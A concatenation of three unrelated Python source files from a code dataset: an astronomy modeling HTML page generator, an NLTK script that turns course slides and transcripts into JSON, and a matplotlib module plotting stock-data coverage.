GEnerate the model page\n if self.has_fitting_run: self.generate_model()\n\n # 10. Generate the fitting page\n if self.has_generation: self.generate_fitting()\n\n # 11. Generate the datacubes page\n if self.has_datacubes: self.generate_datacubes()\n\n # 12. Generate the fluxes page\n if self.has_fluxes: self.generate_fluxes()\n\n # 13. Generate the images page\n if self.has_model_images: self.generate_images()\n\n # 14. Generate the attenuation page\n if self.has_attenuation: self.generate_attenuation()\n\n # 15. Generate the colours page\n if self.has_colours: self.generate_colours()\n\n # 16. Generate the heating page\n if self.has_heating: self.generate_heating()\n\n # 17. Write\n self.write()\n\n # 18. Show\n if self.config.show: self.show()\n\n # -----------------------------------------------------------------\n\n @property\n def has_properties(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"fetch_properties\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_images(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"fetch_images\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_prepared(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"prepare_data\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_components(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"decompose\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_photometry(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"photometry\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_model(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"build_model\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_fitting_run(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"configure_fit\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_generation(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"fit_sed\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_datacubes(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"launch_analysis\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_fluxes(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"launch_analysis\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_model_images(self):\n\n \"\"\"\n This function ....\n :return:\n \"\"\"\n\n return self.history.finished(\"launch_analysis\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_attenuation(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished_any(\"analyse_attenuation_map\", \"analyse_attenuation_curve\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_colours(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n 
return self.history.finished(\"analyse_colours\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_heating(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished_any(\"analyse_cell_heating\", \"analyse_projected_heating\")\n\n # -----------------------------------------------------------------\n\n def setup(self, **kwargs):\n\n \"\"\"\n This function ...\n :param kwargs:\n :return:\n \"\"\"\n\n # Call the setup function of the base class\n super(AllPagesGenerator, self).setup(**kwargs)\n\n # Create the progression\n if \"progression\" in kwargs: self.progression = kwargs.pop(\"progression\")\n else: self.create_progression()\n\n # -----------------------------------------------------------------\n\n def create_progression(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Creating the modeling progression ...\")\n\n # Create\n self.progression = create_modeling_progression(self.config.path)\n\n # -----------------------------------------------------------------\n\n def generate_index(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the index page ...\")\n\n # Generate\n # 'generate_index_page'\n generator = IndexPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_status(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the status page ...\")\n\n # Generate\n # 'generate_status_page'\n generator = StatusPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_data(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the data page ...\")\n\n # Generate\n # 'generate_data_page'\n generator = DataPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_preparation(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the preparation page ...\")\n\n # Generate\n # 'generate_preparation_page'\n generator = PreparationPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_components(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the components page ...\")\n\n # Generate\n # 'generate_components_page'\n generator = ComponentsPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_photometry(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the photometry page ...\")\n\n # Generate\n # 'generate_photometry_page'\n generator = PhotometryPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # 
-----------------------------------------------------------------\n\n def generate_maps(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the maps page ...\")\n\n # Generate the maps page\n # 'generate_maps_page'\n generator = MapsPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.config.model_name = self.progression.model_name\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_model(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the model page ...\")\n\n # Generate the model page\n # 'generate_model_page'\n generator = ModelPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.config.fitting_run = self.progression.fitting_run_name\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_fitting(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the fitting page ...\")\n\n # Generate the fitting page\n # 'generate_fitting_page'\n generator = FittingPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.config.fitting_run = self.progression.fitting_run_name\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_datacubes(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the datacubes page ...\")\n\n # Generate the datacubes page\n # 'generate_datacubes_page'\n generator = DatacubesPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_fluxes(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Generate the fluxes page\n # 'generate_fluxes_page'\n generator = FluxesPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_images(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Generate the images page\n # 'generate_images_page'\n generator = ImagePageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_attenuation(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the attenuation page ...\")\n\n # Generate the attenuation page\n # 'generate_attenuation_page'\n generator = AttenuationPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.config.analysis_run = self.progression.analysis_run_name\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_colours(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the colours page ...\")\n\n # Generate the colours page\n # 'generate_colours_page'\n generator = ColoursPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n 
generator.config.analysis_run = self.progression.analysis_run_name\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_heating(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the heating page ...\")\n\n # Generate the heating page\n # 'generate_heating_page'\n generator = HeatingPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.config.analysis_run = self.progression.analysis_run_name\n generator.run()\n\n # -----------------------------------------------------------------\n\n def write(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Writing ...\")\n\n # -----------------------------------------------------------------\n\n def show(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Showing the pages ...\")\n\n # Open\n browser.open_path(self.environment.html_status_path)\n\n# -----------------------------------------------------------------\n","repo_name":"rag9704/PTS","sub_path":"modeling/html/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":16369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"30388676338","text":"\n# coding: utf-8\n\n# In[70]:\n\n\nimport json\nimport os\nimport codecs\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.stem.porter import *\nfrom pattern.en import parse\nimport nltk\nfrom nltk.corpus import stopwords\nimport numpy as np\nimport ast\n\nstemmer = PorterStemmer()\nlemmatizer = WordNetLemmatizer()\n\nverb_tags = ['VB', 'VBS','VBG','VBN','VBP','VBZ']\n\n\n# In[71]:\n\n\ndef read_file(filename):\n json_dict = {}\n with open(filename, 'r', encoding='utf8') as f:\n x = 0\n line = f.readline()\n while line != '':\n while line == '\\n':\n line = f.readline()\n line = line.split('\\n')[0]\n if line[0] == '\\f':\n for y in range(len(line)):\n if line[y] == '\\f':\n x += 1\n json_dict['slide' + str(x)] = {}\n else:\n break\n if line[1:] == '8/25/2016':\n f.readline()\n line = f.readline()\n json_dict['slide' + str(x)]['title'] = preprocess_string(line)\n else:\n json_dict['slide' + str(x)]['title'] = preprocess_string(line[1:])\n else:\n processed_string = preprocess_string(line)\n if x == 0:\n if line == '8/25/2016':\n f.readline()\n line = f.readline()\n processed_string = preprocess_string(line)\n json_dict['slide' + str(x)] = {}\n json_dict['slide' + str(x)]['title'] = processed_string\n else:\n if 'text' not in json_dict['slide' + str(x)]:\n json_dict['slide' + str(x)]['text'] = processed_string\n else:\n json_dict['slide' + str(x)]['text'] += processed_string\n line = f.readline()\n return json_dict\n\n\n# In[72]:\n\n\ndef read_transcript(slide_content):\n courses = ['bayesian-methods-in-machine-learning', 'cluster-analysis','cs-410',\n 'language-processing']\n for course in courses:\n with os.scandir('./slides_augmented_content/' + course) as it:\n for folder in it:\n if not folder.is_file():\n with os.scandir('./slides_augmented_content/' + course + '/' + folder.name) as transcript_folder:\n for entry in transcript_folder:\n if entry.is_file():\n if entry.name.lower().endswith('.txt'):\n try:\n with open(entry, 'r') as f:\n x = 1\n line = f.readline()\n slide_num = 'slide0'\n while line != '':\n if x % 2 == 1 and line != '\\n':\n slide_num = line.split('\\n')[0][:-4]\n elif x % 2 == 0:\n if entry.name in 
slide_content[course]:\n\n slide_content[course][entry.name][slide_num]['lecture_transcript'] = array2txt(ast.literal_eval(line))\n x += 1\n line = f.readline()\n except FileNotFoundError:\n continue\n print('Finished adding transcript for', entry)\n return slide_content\n\n\n# In[73]:\n\n\ndef array2txt(array):\n string = ''\n for word in array:\n string += (word + ' ')\n return preprocess_string(string[:-1])\n\n\n# Remove all stopwords and lemmatize all words in each line of the slide\n\n# In[74]:\n\n\ndef preprocess_string(string):\n result = ''\n string = string.lower()\n tokenized = nltk.word_tokenize(string)\n for x in range(len(tokenized)):\n if tokenized[x] not in stopwords.words('english'):\n parse_output = parse(tokenized[x], relations=True, lemmata=True).split(\"/\")\n result += parse_output[len(parse_output) - 1].strip() + ' '\n return result[:-1] + '\\n'\n\n\n# In[75]:\n\n\ndef get_course_json(path):\n course = {}\n with os.scandir(path) as it:\n for entry in it:\n if entry.is_file():\n course[entry.name] = read_file(entry)\n print('Finished converting file', entry.name)\n return course\n\n\n# In[76]:\n\n\ndef write_to_json(filename, data):\n with open(filename + '.json', 'w', encoding='utf8') as outfile:\n json.dump(data, outfile)\n\n\n# In[77]:\n\n\ndef main():\n courses = ['bayesian-methods-in-machine-learning', 'bayesian-statistics', 'cluster-analysis','cs-410',\n 'language-processing','ml-clustering-and-retrieval','recommender-systems-introduction', 'text-mining-analytics']\n courses_json = {}\n for course in courses:\n courses_json[course] = get_course_json('./pdftotext/' + course)\n courses_json = read_transcript(courses_json)\n write_to_json('courses_json_preprocessed', courses_json)\n\n\n# In[78]:\n\n\nmain()\n\n\n# In[79]:\n\n\ndef make_json_readable(jsonname, filename):\n data = {}\n with open(jsonname, 'r', encoding='utf8') as f:\n data = json.load(f)\n with open(filename, 'w', encoding='utf8') as f:\n f.write('')\n with open(filename, 'a', encoding='utf8') as f:\n for course in data:\n f.write(course + '{\\n')\n for lecture in data[course]:\n f.write('\\t' + lecture + '{\\n')\n for slide in data[course][lecture]:\n f.write('\\t\\t' + slide + '{\\n')\n for content in data[course][lecture][slide]:\n f.write('\\t\\t\\t' + content + ':' + data[course][lecture][slide][content] + '\\n')\n f.write('\\t\\t}\\n')\n f.write('\\t}\\n')\n f.write('}\\n')\n\n\n# In[80]:\n\n\nmake_json_readable('courses_json_preprocessed.json', 'readable_courses_preprocessed.txt')\n\n","repo_name":"Bhaavya/mooc-web-of-slides","sub_path":"preprocessing_code/txt2json.py","file_name":"txt2json.py","file_ext":"py","file_size_in_byte":6256,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"69800757365","text":"from libraries_and_constants import *\n\n# global variables\nlog = logging_utils.Log(LOG_FILEPATH)\n\nCHART_NAMES = [\n\t'Stock vs Quarter',\n\t'Metric vs Quarter',\n\t'Metric vs Stock',\n\t'Price Data Stock vs Day'\n]\n\n\n\ndef select_chart(\n\tnum_indents=0):\n\n\tuser_input = None\n\twhile user_input == None:\n\t\tlog.print('Select which chart to view:',\n\t\t\tnum_indents=num_indents,\n\t\t\tnew_line_start=True)\n\t\tlog.print('1) stock vs quarter', num_indents=num_indents+1)\n\t\tlog.print('2) metric vs quarter', num_indents=num_indents+1)\n\t\tlog.print('3) metric vs stock', num_indents=num_indents+1)\n\t\tlog.print('4) price data stock vs day', num_indents=num_indents+1)\n\t\tuser_input = input()\n\t\tif user_input not in 
['1', '2', '3', '4']:\n\t\t\tuser_input = None\n\t\t\tlog.print('invalid input, valid inputs are [1, 2, 3, 4]',\n\t\t\t\tnum_indents=num_indents+1)\n\t\telse:\n\t\t\tbreak\n\n\tlog.print('Selected option %s: %s' % (user_input, CHART_NAMES[int(user_input) - 1]),\n\t\tnum_indents=num_indents)\n\treturn int(user_input)\ndef plot_stock_vs_quarter(\n\tverbose=False,\n\tnum_indents=0,\n\tnew_line_start=False):\n\t\n\tlog.print('plotting \\\"%s\\\" chart ...' % CHART_NAMES[0],\n\t\tnum_indents=num_indents, new_line_start=True)\n\n\twith open(METADATA_FILEPATH, 'r') as f:\n\t\tmetadata_dct = json.load(f)\n\tdf = pd.read_csv(\n\t\tQUALITY_REPORT_PATHS['stock_vs_quarter']['variable'],\n\t\tindex_col='cik')\n\n\tnum_stocks = int(metadata_dct['total_number_of_stocks'])\n\tquarters = metadata_dct['quarters_parsed']['quarters']\n\tearliest_quarter = quarters[0]\n\tlatest_quarter = quarters[-1]\n\tnum_quarters = int(metadata_dct['quarters_parsed']['count'])\n\tnum_variable_metrics = int(metadata_dct['number_of_metrics']['variable'])\n\n\n\tfig, ax = plt.subplots()#figsize=(12, 6.5))\n\tfig.canvas.manager.set_window_title(CHART_NAMES[0])\n\tfig.canvas.manager.window.showMaximized() # go fullscreen\n\tcmap = mcolors.LinearSegmentedColormap.from_list(\n\t\t'', ['red', 'orange', 'yellow', 'green'])\n\t# colormaps: https://matplotlib.org/devdocs/tutorials/colors/colormaps.html#list-colormaps\n\tnorm = mcolors.Normalize(vmin=0, vmax=num_variable_metrics)\n\tplot = ax.pcolormesh(df, cmap=cmap, norm=norm)\n\tax.set_title(\n\t\t'Data Coverage of %d variable metrics of %d Stocks over %d Quarters (%.2f Years)' % (\n\t\t\tnum_variable_metrics, num_stocks, num_quarters, (num_quarters / 4)),\n\t\tfontsize=14)\n\tax.set_ylabel('%d Stocks' % num_stocks)# (sorted from least to most coverage)' % num_stocks)\n\tax.set_yticks([])\n\tax.set_xlabel('Quarters')\n\tax.set_xticks(np.arange(0.5, len(df.columns), 1), df.columns, rotation=90) # Code C\n\n\t# legend\n\t# source: https://stackoverflow.com/questions/32462881/add-colorbar-to-existing-axis\n\tdivider = make_axes_locatable(ax)\n\tcax = divider.append_axes('right', size='5%', pad=0.10)\n\tcbar = fig.colorbar(\n\t\tplot,\n\t\tcax=cax,\n\t\torientation='vertical')\n\tcbar.ax.set_ylabel('Percent Data Coverage (out of %d variable metrics)' % num_variable_metrics, fontsize=12)\n\t# tick_locs = np.linspace(0, num_variable_metrics - 1, 5)\n\t# cbar.set_ticks(tick_locs)\n\t# cbar.ax.set_yticklabels(['0 %', '25 %', '50 %', '75 %', '100 %'])\n\n\tdef format_coord(x, y):\n\t\t# TO DO: fix this\n\t\t# if int(x) > len(quarters) or int(x) < 0: return ''\n\t\t# if int(y) > df.shape[0] or int(y) < 0: return ''\n\t\t# print(x, y, len(quarters), df.shape[0])\n\t\tq = quarters[int(x)]\n\t\tcik = df.iloc[int(y)].name\n\t\ts1 = 'quarter=%s' % q\n\t\ts2 = 'cik=%s' % cik\n\t\ts3 = '%d of %d variable metrics found' % (\n\t\t\tdf.at[cik, q], num_variable_metrics)\n\t\treturn '\\t'.join([s1, s2, s3])\n\tax.format_coord = format_coord\n\n\tfig.autofmt_xdate()\n\tfig.tight_layout()\n\tplt.show()\ndef plot_metric_vs_quarter(\n\tverbose=False,\n\tnum_indents=0,\n\tnew_line_start=False):\n\t\n\tlog.print('plotting \\\"%s\\\" chart ...' 
% CHART_NAMES[0],\n\t\tnum_indents=num_indents, new_line_start=True)\n\n\twith open(METADATA_FILEPATH, 'r') as f:\n\t\tmetadata_dct = json.load(f)\n\tdf = pd.read_csv(\n\t\tQUALITY_REPORT_PATHS['metric_vs_quarter']['variable'],\n\t\tindex_col='metric')\n\t# search_cols = list(filter(lambda c : c.split('-')[1] == 'searched', df.columns))\n\t# print(search_cols)\n\t# print(df[search_cols])\n\tquarters = list(set(map(lambda c : c.split('-')[0], df.columns)))\n\tquarters.sort()\n\t# print(quarters)\n\tvariable_metrics = df.index.tolist()\n\t# print(variable_metrics)\n\n\tfraction_df = pd.DataFrame(columns=quarters, index=df.index)\n\tfor q in quarters:\n\t\tfor m in variable_metrics:\n\t\t\tf, s = df.at[m, q+'-found'], df.at[m, q+'-searched']\n\t\t\tfraction_df.at[m, q] = '%s/%s' % (f, s)\n\tprint('\\n\\nFraction:')\n\tprint(fraction_df)\n\n\tpercent_df = pd.DataFrame(columns=quarters, index=df.index)\n\tfor q in quarters:\n\t\tfor m in variable_metrics:\n\t\t\tf, s = df.at[m, q+'-found'], df.at[m, q+'-searched']\n\t\t\tpercent_df.at[m, q] = '%.1f%%' % ((100.0 * f / s) if s != 0 else np.nan)\n\tprint('\\n\\nPercentage:')\n\tprint(percent_df)\n\t\t\t\n\tsys.exit()\n\tprint(percent_df)\n\tprint(len(percent_df.columns))\n\tprint(len(percent_df.columns) // 2)\n\tprint(len(percent_df.columns) // 2 + 1)\n\tsys.exit()\n\n\n\n\n\n\n\n\n\t# actual plot\n\n\tfor i in range(0, len(df.columns), 2):\n\t\tprint(i, i+1)\n\n\tnum_stocks = int(metadata_dct['total_number_of_stocks'])\n\tquarters = metadata_dct['quarters_parsed']['quarters']\n\tearliest_quarter = quarters[0]\n\tlatest_quarter = quarters[-1]\n\tnum_quarters = int(metadata_dct['quarters_parsed']['count'])\n\tnum_variable_metrics = int(metadata_dct['number_of_metrics']['variable'])\n\n\n\tfig, ax = plt.subplots()#figsize=(12, 6.5))\n\tfig.canvas.manager.set_window_title(CHART_NAMES[0])\n\tfig.canvas.manager.window.showMaximized() # go fullscreen\n\tcmap = mcolors.LinearSegmentedColormap.from_list(\n\t\t'', ['red', 'orange', 'yellow', 'green'])\n\t# colormaps: https://matplotlib.org/devdocs/tutorials/colors/colormaps.html#list-colormaps\n\tnorm = mcolors.Normalize(vmin=0, vmax=num_variable_metrics)\n\tplot = ax.pcolormesh(df, cmap=cmap, norm=norm)\n\tax.set_title(\n\t\t'Data Coverage of Fundamental Data of %d Variable Metrics over %d Quarters (%.2f Years)' % (\n\t\tnum_variable_metrics,\n\t\tnum_quarters,\n\t\t(num_quarters / 4)),\n\t\tfontsize=14)\n\tax.set_ylabel('%d Variable Metrics' % num_variable_metrics)\n\tax.set_yticks([])\n\tax.set_xlabel('Quarters')\n\tax.set_xticks(np.arange(0.5, len(df.columns), 1), df.columns)#, rotation=60) # Code C\n\n\t# legend\n\t# source: https://stackoverflow.com/questions/32462881/add-colorbar-to-existing-axis\n\tdivider = make_axes_locatable(ax)\n\tcax = divider.append_axes('right', size='5%', pad=0.10)\n\tcbar = fig.colorbar(\n\t\tplot,\n\t\tcax=cax,\n\t\torientation='vertical')\n\tcbar.ax.set_ylabel('Percent Data Coverage (out of %d variable metrics)' % num_variable_metrics, fontsize=12)\n\t# tick_locs = np.linspace(0, num_variable_metrics - 1, 5)\n\t# cbar.set_ticks(tick_locs)\n\t# cbar.ax.set_yticklabels(['0 %', '25 %', '50 %', '75 %', '100 %'])\n\n\tdef format_coord(x, y):\n\t\tq = quarters[int(x)]\n\t\tvar_m = df.iloc[int(y)].name\n\t\ts1 = 'quarter=%s' % q\n\t\ts2 = 'metric=%s' % var_m\n\t\ts3 = '%d of %d stocks found this metric' % (\n\t\t\tdf.at[var_m, q], num_stocks)\n\t\treturn '\\t'.join([s1, s2, s3])\n\tax.format_coord = 
format_coord\n\n\tfig.autofmt_xdate()\n\tfig.tight_layout()\n\tplt.show()\n\n\n\n''' plot_data_quality_report\n\tReturns:\n\t\tNone, it displays a plot showing the quality of the data for each quarter and each stock.\n\t\tThe plot is a grid with each quarter along the horizontal axis and each stock listed along the vertical axis.\n\t\tEach stock has fundamental data for SOME of the quarters. The stocks are sorted by the number of quarters they\n\t\thave data for. The stock with data for the most number of quarters is at the top and the stock with data for\n\t\tthe least number of quarters is at the bottom. For each quarter there are x fundamental data columns a stock\n\t\tcan have data for. If a stock has data on 100% of its values that cell in the grid is GREEN; if it has 0 that \n\t\tcell is RED, with a gradient inbetween depending on the percentage of data it has.\n\tArguments:\n\t\tverbose - boolean - print to the console if True\n\t'''\ndef plot_data_quality_report(\n\tchart_name,\n\tverbose=True,\n\tnum_indents=0,\n\tnew_line_start=False):\n\n\t# converts start and end quarters to proper end dates according to Google\n\t# Proper End Dates:\n\t# Q1 03/31\n\t# Q2 06/30\n\t# Q3 09/30\n\t# Q4 12/31\n\tdef proper_end_date(date_str):\n\t\ty, m, d = tuple(date_str.split('-'))\n\t\tif '01-01' <= '-'.join([m, d]) <= '03-31': (m, d) = ('03', '31')\n\t\tif '04-01' <= '-'.join([m, d]) <= '06-30': (m, d) = ('06', '30')\n\t\tif '07-01' <= '-'.join([m, d]) <= '09-30': (m, d) = ('09', '30')\n\t\tif '10-01' <= '-'.join([m, d]) <= '12-31': (m, d) = ('12', '31')\n\t\treturn '-'.join([y, m, d])\n\t# gets next proper quarter after date_str\n\tdef next_quarter(date_str):\n\t\ty, m, d = tuple(date_str.split('-'))\n\t\tif '-'.join([m, d]) == '03-31': return '-'.join([y, '06', '30'])\n\t\tif '-'.join([m, d]) == '06-30': return '-'.join([y, '09', '30'])\n\t\tif '-'.join([m, d]) == '09-30': return '-'.join([y, '12', '31'])\n\t\tif '-'.join([m, d]) == '12-31': return '-'.join([str(int(y)+1), '03', '31'])\n\t# creates list of proper quarters\n\tdef get_quarters(assets, verbose=True):\n\n\t\tif verbose: print('\\nGetting Quarter range ...')\n\n\t\t# create list of all quarters\n\t\t# from earliest to latest quarter of all the assets\n\t\tearliest_quarter = assets[list(assets.keys())[0]]['Quarter end'].min()\n\t\tlatest_quarter = assets[list(assets.keys())[0]]['Quarter end'].max()\n\t\tfor i, (ticker, df) in enumerate(assets.items()):\n\t\t\tif df.shape[0] == 0: continue\n\t\t\tlatest_quarter = df['Quarter end'].iloc[0] \\\n\t\t\t\tif df['Quarter end'].iloc[0] > latest_quarter else \\\n\t\t\t\t\tlatest_quarter\n\t\t\tearliest_quarter = df['Quarter end'].iloc[-1] \\\n\t\t\t\tif df['Quarter end'].iloc[-1] < earliest_quarter else \\\n\t\t\t\t\tearliest_quarter\n\n\t\t# convert start and end quarters to proper end dates according to Google\n\t\tearliest_quarter = proper_end_date(earliest_quarter)\n\t\tlatest_quarter = proper_end_date(latest_quarter)\n\n\t\t# create list of all quarters\n\t\tquarters = []\n\t\tq = earliest_quarter\n\t\twhile q <= latest_quarter:\n\t\t\tquarters.append(q)\n\t\t\tq = next_quarter(q)\n\t\tnum_quarters = len(quarters)\n\n\t\tif verbose:\n\t\t\tprint('Quarter Range aquired.')\n\t\t\tprint('\tearliest_quarter = %s' % earliest_quarter)\n\t\t\tprint('\tlatest_quarter = %s' % latest_quarter)\n\t\t\tprint('\tcovering %d quarters, aka %.2f years\\n' % (num_quarters, (num_quarters / 4)))\n\n\t\treturn quarters, num_quarters, earliest_quarter, latest_quarter\n\t# get data coverage percentage each 
quarter for each asset (in 2D array)\n\tdef calculate_data_coverage(assets, quarters, verbose=True, save=True):\n\n\t\tif verbose:\n\t\t\tprint('\\nCalculating data coverage for each asset for each quarter ...')\n\t\t\tstart_time = datetime.now()\n\t\tnumber_of_cols_in_dfs = set(map(lambda df : df.shape[1], list(assets.values())))\n\t\tif len(number_of_cols_in_dfs) != 1:\n\t\t\tprint('Not all the CSV files have the same number of columns.')\n\t\t\tprint('Number of columns in CSV files:' % number_of_cols_in_dfs)\n\t\t\tprint('Aborting creating data quality report.')\n\t\t\tsys.exit()\n\t\tx = list(number_of_cols_in_dfs)[0] - 1 # x = total number of fields (minus the \"Quarter end\" field)\n\t\tdata_coverage = {}\n\t\tbp = BlockPrinter()\n\t\tn = len(assets.keys())\n\t\tfor i, (ticker, df) in enumerate(assets.items()):\n\t\t\tif verbose:\n\t\t\t\tbp.print('Ticker %s:\\tasset %d out of %d, %.1f %% complete.' % (\n\t\t\t\t\tticker, (i+1), n, 100 * (i+1) / n))\n\t\t\tticker_data_coverage = []\n\t\t\tnumber_of_quarters_covered = 0\n\t\t\tticker_proper_quarters_series = df['Quarter end'].apply(lambda q : proper_end_date(q))\n\t\t\tfor q in quarters:\n\t\t\t\ttry:\n\t\t\t\t\tj = ticker_proper_quarters_series[ticker_proper_quarters_series == q].index[0]\n\t\t\t\texcept:\n\t\t\t\t\tj = None\n\t\t\t\t\tnumber_of_data_points_this_quarter = 0\n\t\t\t\tif j != None:\n\t\t\t\t\tquarter_series = df.iloc[j].drop(labels=['Quarter end'])\n\t\t\t\t\tnumber_of_data_points_this_quarter = \\\n\t\t\t\t\t\tquarter_series[quarter_series != 'None'].shape[0]\n\t\t\t\t\tnumber_of_quarters_covered += 1\n\n\t\t\t\tticker_data_coverage.append(number_of_data_points_this_quarter)\n\t\t\tdata_coverage[ticker] = (number_of_quarters_covered, ticker_data_coverage)\n\n\t\t# sort them by number_of_quarters_covered\n\t\tdata_coverage = OrderedDict(sorted(data_coverage.items(), key=lambda x : x[1]))\n\t\tdata_coverage_2D_array = [ticker_data_coverage for ticker, (number_of_quarters_covered, ticker_data_coverage) in data_coverage.items()]\n\n\t\tif save:\n\t\t\tjson.dump(data_coverage, open(PLOT_DATA_PATH, 'w'))\n\n\t\tif verbose:\n\t\t\tend_time = datetime.now()\n\t\t\tprint('Calculations complete. 
Duration: %.1f minutes\\n' % ((end_time - start_time).total_seconds() / 60.0))\n\n\t\treturn data_coverage, data_coverage_2D_array\n\tdef get_data_coverage_from_file():\n\t\tdata_coverage = json.load(open(PLOT_DATA_PATH, 'r'))\n\t\tdata_coverage_2D_array = [ticker_data_coverage for ticker, (number_of_quarters_covered, ticker_data_coverage) in data_coverage.items()]\n\t\treturn data_coverage, data_coverage_2D_array\n\n\n\tassets = self.get_data_of_all_assets('local')\n\tnum_assets = len(assets.keys())\n\tnum_metrics = list(assets.values())[0].shape[1]\n\tcols = list(assets.values())[0].columns\n\t# print(cols)\n\t# print(len(cols))\n\n\tquarters, num_quarters, earliest_quarter, latest_quarter = \\\n\t\tget_quarters(assets, verbose=verbose)\n\t# data_coverage_dct, data_coverage_2D_array = calculate_data_coverage(assets, quarters)\n\tdata_coverage_dct, data_coverage_2D_array = get_data_coverage_from_file()\n\n\t# plot the data coverage\n\tif verbose:\n\t\tprint('\\nPlotting data coverage ...')\n\tfig, ax = plt.subplots()#figsize=(12, 6.5))\n\tfig.canvas.set_window_title(self.report_name)\n\tfig.canvas.manager.window.showMaximized() # go fullscreen\n\tred_to_green_cmap = mcolors.LinearSegmentedColormap.from_list('', ['red', 'yellow', 'green'])\n\t# colormaps: https://matplotlib.org/devdocs/tutorials/colors/colormaps.html#list-colormaps\n\tplot = ax.pcolormesh(data_coverage_2D_array, cmap='RdYlGn')#'RdBu')#red_to_green_cmap)\n\tax.set_title(\n\t\t'Data Coverage of Fundamental Data of %d Stocks over %d Quarters (%.2f 